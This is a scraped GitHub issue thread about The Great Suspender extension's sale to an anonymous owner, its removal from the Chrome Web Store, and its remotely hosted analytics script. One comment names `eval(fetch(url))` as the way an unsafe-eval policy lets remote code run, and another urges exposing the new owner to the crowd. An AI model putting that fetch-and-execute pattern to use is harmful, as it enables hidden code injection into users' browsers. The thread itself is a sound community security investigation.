<p><br /> <strong>@minig0d</strong> If that's a recent copy then that makes me feel MUCH better about this. I'll be honest, after looking through the source I have yet to figure out where the monetization even is happening.</p> <p>The tracking looks like it's just there for tracking open/suspended tab counts and general extension performance.<br /> Looking at manifest.json I'm not seeing any script sources allowed from any crazy domains. In my experience with extension development, Chrome's sandboxing is pretty good about preventing script injection (often infuriatingly so), so this is great news<br /> Looking at the stuff using the onKeyPress event, I also feel much better. I had forgotten that you can disable auto-suspension if there is currently form input. From what I can see here, the only thing listening to onKeyPress/forms is only doing so to check if there is any form input to avoid auto-suspension.<br /> I know i'm just one dude out of a gazillion, but after looking through this source code I am struggling to even figure out why Chrome de-listed this from the webstore. It certainly suggests there is more to this story, though what that might be would be speculation. I would install the extension <strong>@minig0d</strong> linked above without blinking, there's just nothing wrong with it that I can see.</p> <p>I'm going to sleep a lot better having seen this source code, unless there is a more recent version available that contains a smoking gun.</p> <p>Also, I wanted to say thank you to <strong>@deanoemcke</strong> for coming in here and responding despite knowing it wasn't going to be a super-friendly crowd.</p> <p>—<br /> You are receiving this because you were mentioned.<br /> Reply to this email directly, view it on GitHub, or unsubscribe.</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">5</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>FWIW, I have trust in the current maintainer and believe their actions and intent were never malicious. They seemed genuinely distressed at the way this changeover has played out. I believe this bad situation is mainly a result of bad (or lack of) communication. It's important to state here that this is purely my personal intuition - a feeling that involves trust on my part.</p> </blockquote> <p>Dude its simple give us their name and the community will do the rest. Along as you keep protecting their identity its quite simple, You saw a payday and went for it, NOTHING wrong with that your project your work many people will disagree with me there. Just don't lie your ass off and pretend thats not what you did seriously.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/19692962?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="spacecabbie picture"> <strong>spacecabbie</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@rex</strong> I think you're missing the point. The problem is the remotely hosted code, on untrusted hosts.<br /> While the original version only had remotely hosted code from <code>google-analytics.com</code> (which is trusted, Google), the new version had remotely hosted code from <code>cdn.owebanalytics.com</code> (which is unknown).</p> <p>This means that if the owner of the content on this site is malicious, he can take advantage of the permissions granted to the extension, and do anything it desires, without users knowing it because it's separate from the extension's code (and also Google can't look at it). The permission this extension has can be very valuable to a malicious actor, see my first comment above.</p> <p>If you browse now to this site and look at the script it serves, while it is minorly obfuscated (most of the web is), it's harmless. The problem is that they <em>can</em> switch it whenever they want, and also based on the IP of the computer requesting the script, to only target specific people/countries but look innocent to investigators.</p> <p>As <strong>@nfultz</strong> quoted, the new policy of the Chrome webstore team is exactly the solution to this problem. The thing that controls what code is allowed to execute is the CSP (Content-Security-Policy), which is in the extension's manifest. When the new policy kicks in, you won't be able to include code from <code>cdn.owebanalytics.com</code>, nor from <code>google-analytics.com</code>. (I wonder if they'll add an exception to google analytics?). The original extension also had semi-untrusted domains in its CSP (github repos), but it didn't include code from them. Another thing to look out for in CSP is <code>unsafe-eval</code>, it'll allow running code from any domain, with <code>eval(fetch(url))</code>.</p> <p>To sum up, whether you should be worried or not should depend entirely based on whether you trust the domain <code>owebanalytics.com</code> or not, since the fact is that whoever controls this domain had the power to take over your computer without leaving a trace in the code on the chrome webstore (this is assuming the <code>webRequest</code> permission has the power to modify responses, I think it can). Even if the new owner is the best person in the world, <code>owebanalytics.com</code> might not be, and the ball was put in their court.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">9</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@minig0d</strong> If that's a recent copy then that makes me feel MUCH better about this. I'll be honest, after looking through the source I have yet to figure out where the monetization even is happening.</p> </blockquote> <p>For comparison, here is 7.1.9, which many people reviewed and seemed to agree was relatively safe. Honestly, I don't think there was really much of anything wrong in 7.1.9, and suspect Google just pulled it because of all the reports from 7.1.8.</p> <p><a rel="nofollow noopener" target="_blank" href="https://robwu.nl/crxviewer/crxviewer.html?crx=https%3A%2F%2Fwww.crx4chrome.com%2Fgo.php%3Fp%3D1543%26s%3D1%26l%3Dhttps%253A%252F%252Fclients2.googleusercontent.com%252Fcrx%252Fblobs%252FQgAAAC6zw0qH2DJtnXe8Z7rUJP0Vo-3UIIROagEQIz7Wz8mSwfLkzab6H21Q8eNjr0wlu66CeLtUW_jkXgJV1VVt0OhUrwXv5-FBjgyf9uIDxyT_AMZSmuXwbpl6zhFQWdimIaoi6EDHusN2gA%252Fextension_7_1_9_0.crx">https://robwu.nl/crxviewer/crxviewer.html?crx=https%3A%2F%2Fwww.crx4chrome.com%2Fgo.php%3Fp%3D1543%26s%3D1%26l%3Dhttps%253A%252F%252Fclients2.googleusercontent.com%252Fcrx%252Fblobs%252FQgAAAC6zw0qH2DJtnXe8Z7rUJP0Vo-3UIIROagEQIz7Wz8mSwfLkzab6H21Q8eNjr0wlu66CeLtUW_jkXgJV1VVt0OhUrwXv5-FBjgyf9uIDxyT_AMZSmuXwbpl6zhFQWdimIaoi6EDHusN2gA%252Fextension_7_1_9_0.crx</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@rex</strong> I think you're missing the point. The problem is the remotely hosted code, on untrusted hosts.<br /> While the original version only had remotely hosted code from <code>google-analytics.com</code> (which is trusted, Google), the new version had remotely hosted code from <code>cdn.owebanalytics.com</code> (which is unknown).</p> <p>This means that if the owner of the content on this site is malicious, he can take advantage of the permissions granted to the extension, and do anything it desires, without users knowing it because it's separate from the extension's code (and also Google can't look at it). The permission this extension has can be very valuable to a malicious actor, see my first comment above.</p> <p>If you browse now to this site and look at the script it serves, while it is minorly obfuscated (most of the web is), it's harmless. The problem is that they _can_ switch it whenever they want, and also based on the IP of the computer requesting the script, to only target specific people/countries but look innocent to investigators.</p> <p>As <strong>@nfultz</strong> quoted, the new policy of the Chrome webstore team is exactly the solution to this problem. The thing that controls what code is allowed to execute is the CSP (Content-Security-Policy), which is in the extension's manifest. When the new policy kicks in, you won't be able to include code from <code>cdn.owebanalytics.com</code>, nor from <code>google-analytics.com</code>. (I wonder if they'll add an exception to google analytics?). The original extension also had semi-untrusted domains in its CSP (github repos), but it didn't include code from them. Another thing to look out for in CSP is <code>unsafe-eval</code>, it'll allow running code from any domain, with <code>eval(fetch(url))</code>.</p> <p>To sum up, whether you should be worried or not should depend entirely based on whether you trust the domain <code>owebanalytics.com</code> or not, since the fact is that whoever controls this domain had the power to take over your computer without leaving a trace in the code on the chrome webstore (this is assuming the <code>webRequest</code> permission has the power to modify responses, I think it can). Even if the new owner is the best person in the world, <code>owebanalytics.com</code> might not be, and the ball was put in their court.</p> </blockquote> <p>It closes a lot of the security concerns here but not entirely... The fact still remains that Google's extension review is cursory at best... and I'm quite sure there will be ways to execute nefarious code... among the many security problems are that people don't actually know what the permissions requested mean. Like how would a lay person know why this extension needs the webrequest permission? While it's being nixed for a tamer declarativeNetRequest API, still, inevitably unknowing people will open themselves up to abuse. Manivest v3 won't fix the problem.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>If anyone has a Session Buddy export or can get hold of a txt list of Great Suspender queries, it's quick and easy to strip these out into base URLs with regex. E.g., using Notepad++.</p> <p>Replace<br /> chrome-ext.*uri=http</p> <p>With<br /> http</p> <p>These cleaned URLs can then be pushed back into Chrome painlessly using Session Buddy or another tab manager.</p> <p>(I know this is really basic but some readers might benefit from this.)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/24517527?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="alvinlim-ucb picture"> <strong>alvinlim-ucb</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Thanks to everyone for all the hard work investigating this. I see a lot of instructions on how to recover tabs, reinstall old versions etc, but haven't seen an answer to my current question: if I look at current TGS settings and it says 7.1.6 (downloaded from chrome web store), can I just keep using it without issue? Or has it been retroactively compromised?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/77774546?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="jimmhay picture"> <strong>jimmhay</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@jimmhay</strong> I believe it can't be "retroactively compromised", I doubt the webstore allows distributing an update to an old version, I assume updates can only come with a new version number.<br /> So if you can prevent it auto-updating (I don't know how), then yeah it's fine.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/26556598?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="NotWearingPants picture"> <strong>NotWearingPants</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@NotWearingPants</strong> Thank you, and just remembered I installed from github, not the web store. Which should be even better since there's no auto-update, and I guess is also why it's still running just fine in Chrome :)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/77774546?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="jimmhay picture"> <strong>jimmhay</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>we have been working together to try to find a way forwards that would reestablish trust in this extension</p> </blockquote> <p><strong>@deanoemcke</strong> </p> <p>An <strong>absolutely necessary</strong>, but not sufficient, part of establishing trust? Reveal <em>who</em> these new owners are. That should be the absolute first step.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6212837?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="jimcullenaus picture"> <strong>jimcullenaus</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> ❤<span class="ml-2 mr-3">12</span> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>On January 23rd, I followed a Google search to thesaurus.net and noticed that the website was encouraging download of malware:</p> <p><img loading="lazy" src="https://user-images.githubusercontent.com/844258/106972474-8ac46400-6716-11eb-9a8c-f149ace205e7.png" alt="Screen Shot 2021-02-04 at 6 25 13 PM" /></p> <p>I thought it was a compromised or devious website (it's overloaded with ads already), but after The Great Suspender was disabled today, I revisited, and although all the other ads were there, the "system messages" encouraging installing/updating the Flash Player were not. It's possible that thesaurus.net was displaying those and no longer is, but I'm wondering whether they were actually injected by The Great Suspender.</p> <p>If there's a better place to report this, please let me know.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/844258?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="daniel-nelson picture"> <strong>daniel-nelson</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I don't have any tabs in my history to test this on... but this may help someone without installing any extensions... if you don't understand JS or know what DevTools is please use the extension routes mentioned above...</p> <p>Step 1: go to <a rel="nofollow noopener" target="_blank" href="chrome://history/">chrome://history/</a><br /> Step 2: type/paste the following into the search box: chrome-<a rel="nofollow noopener" target="_blank" href="extension://klbibkeccnjlkjkiokjodocebajanakg">extension://klbibkeccnjlkjkiokjodocebajanakg</a><br /> Step 3: Run the following to load some helper functions (minimized/compressed version of the <a rel="nofollow noopener" target="_blank" href="https://github.com/Georgegriff/query-selector-shadow-dom">query-selector-shadow-dom</a> functions)<br /> <code>function querySelectorAllDeep(selector,root=document,allElements=null){return _querySelectorDeep(selector,!0,root,allElements)}function querySelectorDeep(selector,root=document,allElements=null){return _querySelectorDeep(selector,!1,root,allElements)}function _querySelectorDeep(selector,findMany,root,allElements=null){selector=normalizeSelector(selector);let lightElement=root.querySelector(selector);if(document.head.createShadowRoot||document.head.attachShadow){if(!findMany&&lightElement)return lightElement;const selectionsToMake=splitByCharacterUnlessQuoted(selector,",");return selectionsToMake.reduce((acc,minimalSelector)=>{if(!findMany&&acc)return acc;const splitSelector=splitByCharacterUnlessQuoted(minimalSelector.replace(/^\s+/g,"").replace(/\s*([>+~]+)\s*/g,"$1")," ").filter(entry=>!!entry).map(entry=>splitByCharacterUnlessQuoted(entry,">")),possibleElementsIndex=splitSelector.length-1,lastSplitPart=splitSelector[possibleElementsIndex][splitSelector[possibleElementsIndex].length-1],possibleElements=collectAllElementsDeep(lastSplitPart,root,allElements),findElements=findMatchingElement(splitSelector,possibleElementsIndex,root);return findMany?acc=acc.concat(possibleElements.filter(findElements)):(acc=possibleElements.find(findElements))||null},findMany?[]:null)}return findMany?root.querySelectorAll(selector):lightElement}function findMatchingElement(splitSelector,possibleElementsIndex,root){return element=>{let position=possibleElementsIndex,parent=element,foundElement=!1;for(;parent&&!isDocumentNode(parent);){let foundMatch=!0;if(1===splitSelector[position].length)foundMatch=parent.matches(splitSelector[position]);else{const reversedParts=[].concat(splitSelector[position]).reverse();let newParent=parent;for(const part of reversedParts){if(!newParent||!newParent.matches(part)){foundMatch=!1;break}newParent=findParentOrHost(newParent,root)}}if(foundMatch&&0===position){foundElement=!0;break}foundMatch&&position--,parent=findParentOrHost(parent,root)}return foundElement}}function splitByCharacterUnlessQuoted(selector,character){return selector.match(/\\?.|^$/g).reduce((p,c)=>('"'!==c||p.sQuote?"'"!==c||p.quote?p.quote||p.sQuote||c!==character?p.a[p.a.length-1]+=c:p.a.push(""):(p.sQuote^=1,p.a[p.a.length-1]+=c):(p.quote^=1,p.a[p.a.length-1]+=c),p),{a:[""]}).a}function isDocumentNode(node){return node.nodeType===Node.DOCUMENT_FRAGMENT_NODE||node.nodeType===Node.DOCUMENT_NODE}function findParentOrHost(element,root){const parentNode=element.parentNode;return parentNode&&parentNode.host&&11===parentNode.nodeType?parentNode.host:parentNode===root?null:parentNode}function collectAllElementsDeep(selector=null,root,cachedElements=null){let allElements=[];if(cachedElements)allElements=cachedElements;else{const findAllElements=function(nodes){for(let i=0,el;el=nodes[i];++i)allElements.push(el),el.shadowRoot&&findAllElements(el.shadowRoot.querySelectorAll("*"))};root.shadowRoot&&findAllElements(root.shadowRoot.querySelectorAll("*")),findAllElements(root.querySelectorAll("*"))}return allElements.filter(el=>el.matches(selector))}function normalizeSelector(sel){function saveUnmatched(){unmatched&&(tokens.length>0&&/^[~+>]$/.test(tokens[tokens.length-1])&&tokens.push(" "),tokens.push(unmatched))}var tokens=[],match,unmatched,regex,state=[0],next_match_idx=0,prev_match_idx,not_escaped_pattern=/(?:[^\\]|(?:^|[^\\])(?:\\\\)+)$/,whitespace_pattern=/^\s+$/,state_patterns=[/\s+|\/\*|["'>~+[(]/g,/\s+|\/\*|["'[\]()]/g,/\s+|\/\*|["'[\]()]/g,null,/\*\//g];for(sel=sel.trim();;){if(unmatched="",(regex=state_patterns[state[state.length-1]]).lastIndex=next_match_idx,!(match=regex.exec(sel))){unmatched=sel.substr(next_match_idx),saveUnmatched();break}if((prev_match_idx=next_match_idx)<(next_match_idx=regex.lastIndex)-match[0].length&&(unmatched=sel.substring(prev_match_idx,next_match_idx-match[0].length)),state[state.length-1]<3){if(saveUnmatched(),"["===match[0])state.push(1);else if("("===match[0])state.push(2);else if(/^["']$/.test(match[0]))state.push(3),state_patterns[3]=new RegExp(match[0],"g");else if("/*"===match[0])state.push(4);else if(/^[\])]$/.test(match[0])&&state.length>0)state.pop();else if(/^(?:\s+|[~+>])$/.test(match[0])&&(tokens.length>0&&!whitespace_pattern.test(tokens[tokens.length-1])&&0===state[state.length-1]&&tokens.push(" "),1===state[state.length-1]&&5===tokens.length&&"="===tokens[2].charAt(tokens[2].length-1)&&(tokens[4]=" "+tokens[4]),whitespace_pattern.test(match[0])))continue;tokens.push(match[0])}else tokens[tokens.length-1]+=unmatched,not_escaped_pattern.test(tokens[tokens.length-1])&&(4===state[state.length-1]&&(tokens.length<2||whitespace_pattern.test(tokens[tokens.length-2])?tokens.pop():tokens[tokens.length-1]=" ",match[0]=""),state.pop()),tokens[tokens.length-1]+=match[0]}return tokens.join("").trim()}</code></p> <p>Step 4: Run this:<br /> <code>var urls="";querySelectorAllDeep('.history-cards a#link').map( a=> { if (a.href) urls += a.href.replace(/^chrome.*?uri=/,"")+"\n"; }); console.log(urls); copy(urls);</code></p> <p>It should spit out all the urls one per line to the console AND copy them to your clipboard (you can paste the entire list in notepad or whatever you'd like :)</p> <p>could be modified to open all the tabs back up too... </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Another solution described here <a rel="nofollow noopener" target="_blank" href="https://github.com/barseghyanartur/the-great-suspender-restore-urls">https://github.com/barseghyanartur/the-great-suspender-restore-urls</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4925587?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="barseghyanartur picture"> <strong>barseghyanartur</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 🚀<span class="ml-2 mr-3">1</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@NotWearingPants</strong> That's completely fair. So it turns out my positive review above was somewhat misplaced. I'll be honest, I knew there was an open-source version of google analytics called Open Web Analytics and thought this was that, but it turns out <strong>nope!</strong> The _legitimate_ one is being hosted/served from <code>openwebanalytics.com</code>. Clearly <code>owebanalytics.com</code> is an attempt to _seem_ legitimate and familiar, which usually indicates malicious intent. Then I went to the website itself, which I hadn't done yet, and saw the CentOS page and realized they're trying to make it look credible by using a popular open source software page, insinuating that this open source analytics software is in some way related to CentOS? </p> <p>Having read through the source code in the <code>.crx</code> <strong>@minig0d</strong> linked above I am pretty confident _that_ code is not malicious. But <strong>I am not afraid to admit when I am wrong.</strong> I had not done my due diligence before saying it was not malicious. Having seen the phishing-attack-style URL matching and the clearly ripped off CentOS page, I _categorically_ retract my statements above. The script we've seen served from there does not appear malicious, but that clearly shady server could be serving up different JS if/when it chooses to.</p> <p>It's such a damn shame, <strong>@deanoemcke</strong> works for years to build this incredible, massively popular extension then hands it off to someone who proceeds to just nuke it out of the sky for no clear benefit.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4247754?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="rex picture"> <strong>rex</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">10</span> ❤<span class="ml-2 mr-3">5</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>FWIW: In recent months I noticed a lot of image and video loading (massive lag) issues on reddit. These issues disappeared after removing the latest version of the extension (that was pulled from the app store). These issues also did not and do not exist in the last "real" version 7.1.6.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7757052?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="michealespinola picture"> <strong>michealespinola</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>In order to export and import all the <strong>saved sessions</strong> I successfully followed this procedure <a rel="nofollow noopener" target="_blank" href="https://github.com/agiudiceandrea/import-export-IndexedDB/blob/main/README.md">https://github.com/agiudiceandrea/import-export-IndexedDB/blob/main/README.md</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/16253859?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="agiudiceandrea picture"> <strong>agiudiceandrea</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Is ver 7.1.6 safe? I've had it for a while and never updated it, seems to be from pre-ownership transition, yeah? I'm still going to uninstall it, but I'd just like to know if I'm compromised and need to change a ton of passwords.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/69437790?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="PatrickLearn picture"> <strong>PatrickLearn</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>7.1.6, is the last version from the original author. It's considered safe (at least the version here on GitHub).</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7757052?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="michealespinola picture"> <strong>michealespinola</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 🎉<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>In order to export and import all the <strong>saved sessions</strong> I successfully followed this procedure <a rel="nofollow noopener" target="_blank" href="https://github.com/agiudiceandrea/import-export-IndexedDB/blob/main/README.md">https://github.com/agiudiceandrea/import-export-IndexedDB/blob/main/README.md</a></p> </blockquote> <p>Seems like a looooot of extra work if youre just trying to downgrade... wouldn't it just be easier to copy the database to the new extension?</p> <p>(COMPLETELY UNTESTED use at your own risk... but worst case scenario you should be able to just delete that folder you copied... since you're not messing with the original data)</p> <p>1) Install the old version of TGS from GH.<br /> 2) Get the ID for the new extension by either going to <a rel="nofollow noopener" target="_blank" href="chrome://extensions/">chrome://extensions/</a> and clicking on the Details button and look in the location bar (should say: chrome://extensions/?id=<<the new id number>>)<br /> 3) Close chrome...<br /> 4) Navigate to your Chrome profile's IndexedDB folder... In modern Windows/default installations the path should be: "%LOCALAPPDATA%\Google\Chrome\User Data\Default\IndexedDB\"<br /> 5) You should see a folder called something like: chrome-extension_klbibkeccnjlkjkiokjodocebajanakg_0.indexeddb.leveldb make a COPY the folder changing the old ID of<br /> klbibkeccnjlkjkiokjodocebajanakg to the new ID you found in step 2. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>You don't have to go through nearly all those hoops to export and import your old session data. You don't need to run any additional javascript, etc. This can all be accomplished with built-in export and import procedures for the extension:</p> <ol> <li>Quit Chrome</li> <li>Disable your Internet connection</li> <li>Open Chrome and re-enable the Bad version of TGS</li> <li>Open your Extensions panel, and open the Details of the Bad version of TGS</li> <li>Click Extension Options</li> <li>Click Session Management</li> <li>Export your most recent session (session.txt)</li> <li>Disable the Bad version of TGS</li> <li>Quit Chrome</li> <li>Renable your Internet connection</li> <li>Start Chrome</li> <li>Open Chrome, open your Extensions panel, and open the Details of the Good version of TGS (installed it from GitHub, etc)</li> <li>Click Extension Options</li> <li>Click Session Management</li> <li>Click Import Session</li> <li>Select your exported session,txt file</li> </ol> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/7757052?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="michealespinola picture"> <strong>michealespinola</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 🚀<span class="ml-2 mr-3">2</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>It seems there are 3 main points of discussion here which may well benefit from being discussed in isolation from each other.</p> <ol> <li><p>The extension has been removed from the chrome webstore and as a result users are losing their suspended tabs.</p></li> <li><p>Since the transfer of ownership the new maintainer has made some decisions that have created concern within the community about possible malware within the extension.</p></li> <li><p>The context around how the decision was made to sell the extension and the ethics of this.</p></li> </ol> <p>I will try to address these as best I can:</p> <ol> <li><p>This is a disastrous outcome for the extension and has always been my worst case scenario. The maintainer is aware of the situation and is trying to get the extension back into the store. This is the best chance to limit the potential loss of tabs for users.</p></li> <li><p>Only the current maintainer knows the motivations behind these actions. I had had no contact with them since the transfer until recently, when I got in contact hoping to encourage them to provide some transparency on the gitHub project page.</p></li> <li><p>Before the decision to sell the extension I had made significant steps towards monetising the extension myself (by way of limiting the feature set and providing a premium version). It became clear to me during this process that I did not have the passion required for the project, given the added expectations a paid product would require. I have no qualms with the monetisation of any product, and saw selling the extension as a way of offloading that opportunity to somebody else.<br /> I saw the extension space as a regulated free market. Chrome has policies in place to protect against bad actors, and violating these policies will result in removal of the extension. Therefore the only viable way to monetise is by adhering to these policies. There is a little more to it than this though. As others have expressed, during my time working on this extension I have received numerous offers from people, most of which I ignored. I would occasionally engage with those that seemed more respectable and can say that amongst these have been some genuine people with seemingly honest intentions. As mentioned already, I built up a level of trust with the new maintainers. I left the decision of how to monetise for them to choose. And I was ok with that.<br /> I am not at all happy with how this has turned out. I'm open to criticism on my personal actions. It was not an easy decision for me and it was the above reasoning that led me down this road. Ultimately I was prepared to make the sacrifices to the extension that monetisation incurs (that is, UX sacrifices), in exchange for some financial reward. That still does not sit easy with me, but I don't think it is inherently wrong either. Perhaps the outcome of this will help inform others in a similar position.</p></li> </ol> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1051763?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="deanoemcke picture"> <strong>deanoemcke</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">14</span> 👎<span class="ml-2 mr-3">10</span> ❤<span class="ml-2 mr-3">8</span> 👀<span class="ml-2 mr-3">5</span> 😕<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@deanoemcke</strong> Why has the new maintainer been able to remain anonymous? Is it your choice or theirs? If theirs, did you not think this suspicious? </p> <p>I don't really blame you for cashing out. That's fine. You created a product with a lot of demand. It had value, but you had no way to realize that value. Welcome to open source / browser extensions. It's a business model that doesn't work.</p> <p>But, in the process you have likely lost your integrity and the ability to create future projects that might also have value. That's the risk, and I hope the monetary reward was enough to make it worth it. Once trust is gone, it's gone.</p> <p>In the end, all extension authors should realize the truth - there are NO good actors who purchase extensions. If you sell a popular extension, you are selling your soul as well. Maybe it's worth it. Maybe not. But don't fool yourself into thinking you're doing anything to the contrary.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2974436?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="matt-kruse picture"> <strong>matt-kruse</strong> <span class="text-muted ml-1">on 5 Feb 2021</span> </div> <div class="col 